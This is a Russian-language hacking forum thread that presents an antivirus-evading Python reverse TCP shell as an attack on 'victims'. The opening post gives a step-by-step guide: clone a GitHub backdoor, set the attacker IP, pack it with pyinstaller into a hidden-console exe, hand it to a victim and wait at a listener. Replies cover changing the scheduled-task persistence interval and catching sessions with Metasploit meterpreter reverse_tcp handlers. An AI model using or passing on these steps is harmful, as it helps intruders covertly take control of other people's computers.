Обход антивируса (Reverse Python Shell) 100% FUD

~~^Shad0w __ Just1ce^~~

~^_Wired FaLc❍n_^~
ELEET
19.10.2016
699
2 349
DarkSide
www.youtube.com
#1
Привет.С вами DarkNode )
Сегодня будем обходить антивирус через Python Reverse TCP Shell.
ТОЛЬКО ПОСЛЕ ПРОЧТЕНИЯ НЕ ВЗДУМАЙТЕ ***** СЛИВАТЬ БИНАРНИК НА ВТ (ВирусТотал)

Итак наткнулся на гитхабе на прикольную реалиазацию reverse_tcp_shell через планировщик задач с использованием XML темплейта)
Довольно таки прикольно имхо)


Состоит наш бэкдор опять же таки из двух частей:

Серверная часть:
reverse_tcp.py - вредоносный питоновоский скрипт ,который запускаеться на стороне жертвы
может быть упакован в "exe" файл используя pyinstaller
На windows машине , выполните команду:
Код:
pyinstaller --noconsole --onefile --icon=iconfile.ico reverse_tcp.py
для упаковки в бинарный файл.

listener.js
Простенький мультиклиентный листенер написанный на javascript(node.js)
Команды:
help
exit --- выйти из listener
list --- посмотреть список жертв
connect num --- подкючится к одной жертве
например 'connect 0' подключимся к жертве которая имеет идентификатор 0 в списке
schedule n_minutes --- Планировщик задач|schedule attack(только для Windows only), принудительно указать время каждого конекта к атакуемой машине через определенный интервал в минутах


Качаем:

Код:
git clone https://github.com/shd101wyy/Python_Reverse_TCP.git


How to Hack (для Windows)
1)Меняем переменную attacker_ip в reverse_tcp.py на ip address атакуещего.


2)Запускаем команду pyinstaller --noconsole --onefile reverse_tcp.py создаем reverse_tcp.exe


3)Парим бинарник жертве
4)Запускаем листенер командой nodejs listener.js и ждем конекта жертвы.




 

MAdDog719

Well-Known Member
Премиум
16.08.2016
108
26
30
#2
schedule n_minutes --- Планировщик задач|schedule attack(только для Windows only), принудительно указать время каждого конекта к атакуемой машине через определенный интервал в минутах
скажи, пожалуйста, этот параметр нужно указывать в скрипте, или уже после того как получил сессию?
 

~~^Shad0w __ Just1ce^~~

~^_Wired FaLc❍n_^~
ELEET
19.10.2016
699
2 349
DarkSide
www.youtube.com
#3
скажи, пожалуйста, этот параметр нужно указывать в скрипте, или уже после того как получил сессию?
Это команда непосредственно в консоли управления (после запуска nodejs listener.js и когда жертва заразилась) задает интервал каждого последующего подключения.
По умолчанию при запусуке вредоноса жертва будет подкючаться к тебе каждые 30 минут,так как это прописано в скрипте самом.Поэтому можно подредактировать скрипт под себя и опционально указать дефолтный интервал времени в reverse_tcp.py
В даном случае поищи функцию функцию generateSheduleTask()
В твоем случае просто можешь изменить в скрипте
Код:
xml.write(generateScheduleTask(30))
На
Код:
xml.write(generateScheduleTask(Нужный_Интервал_В_Минутах))
 

MAdDog719

Well-Known Member
Премиум
16.08.2016
108
26
30
#4
Это команда непосредственно в консоли управления (после запуска nodejs listener.js и когда жертва заразилась) задает интервал каждого последующего подключения.
По умолчанию при запусуке вредоноса жертва будет подкючаться к тебе каждые 30 минут,так как это прописано в скрипте самом.Поэтому можно подредактировать скрипт под себя и опционально указать дефолтный интервал времени в reverse_tcp.py
В даном случае поищи функцию функцию generateSheduleTask()
В твоем случае просто можешь изменить в скрипте

Код:
xml.write(generateScheduleTask(30))
На
Код:
xml.write(generateScheduleTask(Нужный_Интервал_В_Минутах))
Понял, спасибо)
 

MAdDog719

Well-Known Member
Премиум
16.08.2016
108
26
30
#6
я так понял ошибка потому что не установлен PyCrypto, но при установке возникает новая ошибка



пока не знаю как побороть проблему
 

MAdDog719

Well-Known Member
Премиум
16.08.2016
108
26
30
#8
При попытке получить сессию через msfconsole, вылетает ошибка на стороне жертвы
 

MAdDog719

Well-Known Member
Премиум
16.08.2016
108
26
30
#10
Подскажите в какой процес оно прячется?? Каждые 30 мин вылетает ошибка такая как на скрине 3. Уже и перезагружался не помогает.
 

~~^Shad0w __ Just1ce^~~

~^_Wired FaLc❍n_^~
ELEET
19.10.2016
699
2 349
DarkSide
www.youtube.com
#11
Ошибка вылетает потому что листенер не запущен на стороне атакуещего...


А посмотреть и удалить процес можно в планировщике заданий
Выполнить команду на виндоус машине:
Пуск--->Выполнить--->taskschd.msc


 

MAdDog719

Well-Known Member
Премиум
16.08.2016
108
26
30
#12
Метасплоит же не нужен тут...


для этого есть listener.js
как бы да, но по моему у метасплоит куда больше возможностей, нежели у listener.js, хотя может я не разобрался как с ним работать, но пока могу только лазать по папкам жертвы, возможно есть способ залить через него какой то бекдор?
 

~~^Shad0w __ Just1ce^~~

~^_Wired FaLc❍n_^~
ELEET
19.10.2016
699
2 349
DarkSide
www.youtube.com
#13
Легко)
как бы да, но по моему у метасплоит куда больше возможностей, нежели у listener.js, хотя может я не разобрался как с ним работать, но пока могу только лазать по папкам жертвы, возможно есть способ залить через него какой то бекдор?
Вот написал как это очень легко делаться.
Получить метерпретер сессию
 

Drupa

New Member
23.12.2016
2
0
24
#16
Инструмент хороший, все очень легко настроилось, без всяких проблем. вот только не пойму чачем такой сложный процесс перехвата нельзя ли просто
exploit/multi/handler
payload windows/meterpreter/reverse_tcp
и все ?!

не каким образом нет нормально соединения к meterpreter засисает подключении и больше рукопожатие не происходит
как на скриншоте, значит только через listener.js возможно пользоваться
 

Вложения

  • 71.4 КБ Просмотры: 25
Последнее редактирование модератором:

~~^Shad0w __ Just1ce^~~

~^_Wired FaLc❍n_^~
ELEET
19.10.2016
699
2 349
DarkSide
www.youtube.com
#17
Инструмент хороший, все очень легко настроилось, без всяких проблем. вот только не пойму чачем такой сложный процесс перехвата нельзя ли просто
exploit/multi/handler
payload windows/meterpreter/reverse_tcp
и все ?!

не каким образом нет нормально соединения к meterpreter засисает подключении и больше рукопожатие не происходит
как на скриншоте, значит только через listener.js возможно пользоваться
Попробуй другой пейлоад:
Снимок.PNG
 

Drupa

New Member
23.12.2016
2
0
24
#18
Попробовал конект происходит и тут же отключается как видно на скришноше. Что можно придумать ?

ошибку я понял так : дисконект происходит потому, что exe отличается шифрованием поэтому этот пайлоад не может с ним работать. Если я не прав или что то не понимаю, прошу поправьте меня пожалуйста
 

Вложения

Последнее редактирование:
27.12.2016
33
1
27
#19
что это он мне пишет??? я не могу понять инструкцию:( я выполняю комаеду---
root@DDoS:~# git clone
Чтобы видеть этот контент необходимо: Войти или зарегистрироваться

Клонирование в «Python_Reverse_TCP»…
fatal: unable to access '
Чтобы видеть этот контент необходимо: Войти или зарегистрироваться
': Received HTTP code 503 from proxy after CONNECT

Могу ли я упаковать в exe на linux kali машине???
 
Последнее редактирование:

ghostphisher

гарант codeby
ELEET
07.12.2016
1 900
1 983
38
#20
Вот Вам же пишет система в чем проблема, не можете настроить связь через ТОР или прокси для всей системы - учите или качайте архивом через кнопку Download через браузер